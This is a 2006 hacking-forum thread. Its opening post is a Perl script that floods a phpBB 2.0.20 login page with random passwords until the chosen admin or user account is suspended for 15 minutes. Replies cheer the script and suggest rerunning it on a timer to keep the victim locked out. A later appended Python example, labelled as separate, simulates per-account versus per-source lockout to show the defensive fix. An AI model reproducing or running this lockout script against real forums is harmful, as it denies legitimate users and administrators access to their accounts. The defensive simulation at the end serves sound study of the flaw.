FORUM DARKERS

Security & Hacking => Bugs | Exploits | Vulnerabilities => Topic started by: DarkGenesis on 27 June 2006, 12:41:12 AM

Title: [ phpBB 2.0.20 ] Disable Admin
Post by: DarkGenesis on 27 June 2006, 12:41:12 AM
###################################################################################
#!/usr/bin/perl
# Priv8 Exploit for PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
#Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "TCP"))
{


$password=rand();
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read  $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}}

* This exploit disables the admin or another user in phpBB forums for 15 min  ;)
Source: h4cky0u
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: #phobia on 27 June 2006, 11:37:40 AM
Hahaha, looks pretty cool! hehe
I'm going to test it... =)
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: Security on 11 July 2006, 01:24:54 AM
This exploit disables the admin or another user in phpBB forums for 15 min
I didn't really understand it..
what does it do?
bye
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: DarkGenesis on 11 July 2006, 09:21:41 AM
They will be unable to log in to the forum for a period of 15 min.
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: branco on 11 July 2006, 01:19:15 PM
I believe what it does is keep logging in to the forum, so the guy's account gets suspended for 15 min
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: Security on 15 July 2006, 11:45:12 AM
But only for admin, not moderator, right?
thanks
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: HadeS on 15 July 2006, 11:10:46 PM
ANY user.

HadeS
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: Anonymous on 16 July 2006, 03:27:14 AM
it just makes unsuccessful attempts to log in as that user
which leaves that user's login suspended for 30 min

I think only 5 attempts are needed
Title: Re: [ phpBB 2.0.20 ] Disable Admin
Post by: slul on 16 July 2006, 04:20:51 AM
Quote from: "fuhrer"
it just makes unsuccessful attempts to log in as that user
which leaves that user's login suspended for 30 min

I think only 5 attempts are needed

yes, and the exploit can be optimized, like giving it a microtime so it runs again every 15 or 30 minutes :)

I don't know the microtime function in perl

whoever knows and wants to do it, there's the tip

I think that's how it is,

 see you
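
Added example (not part of the thread and not phpBB code): the posts above describe failed logins suspending the targeted account, so this Python code replays constructed login events against a lockout keyed on the username alone and against one keyed on username plus source address. The 5-failure threshold and 15-minute window are the figures mentioned in the thread; the class, function names and addresses are hypothetical.

```python
# Added example: constructed data and hypothetical names; not phpBB's code.
from collections import defaultdict

MAX_FAILS = 5            # assumption: attempt count mentioned in the thread
LOCK_SECONDS = 15 * 60   # assumption: window stated in the script header


class Throttle:
    """Failed-login throttle; key_fn decides which identity gets locked."""

    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.fails = defaultdict(list)  # key -> timestamps of recent failures

    def locked(self, key, now):
        # Keep only failures still inside the lockout window.
        self.fails[key] = [t for t in self.fails[key] if now - t < LOCK_SECONDS]
        return len(self.fails[key]) >= MAX_FAILS

    def login(self, user, ip, password_ok, now):
        key = self.key_fn(user, ip)
        if self.locked(key, now):
            return "locked"          # rejected before the password is checked
        if password_ok:
            self.fails.pop(key, None)
            return "ok"
        self.fails[key].append(now)
        return "fail"


def replay(throttle, events):
    return [throttle.login(*event) for event in events]


# Constructed events: (user, source address, password correct?, unix time).
# Six wrong passwords for "admin" from one address, then the real admin
# logging in with the right password from a different address.
EVENTS = [("admin", "203.0.113.9", False, t) for t in range(0, 12, 2)]
EVENTS.append(("admin", "198.51.100.7", True, 60))


def per_account():
    # Weak design: anyone who knows the username can lock its owner out.
    return replay(Throttle(lambda user, ip: user), EVENTS)


def per_account_and_source():
    # Only the source that produced the failures is throttled.
    return replay(Throttle(lambda user, ip: (user, ip)), EVENTS)


if __name__ == "__main__":
    print("per account:         ", per_account())
    print("per account + source:", per_account_and_source())
```

Keying on the source address alone lets guesses spread across many addresses pass, so it is normally paired with a per-account control that slows attempts (a delay or CAPTCHA) instead of denying the login outright.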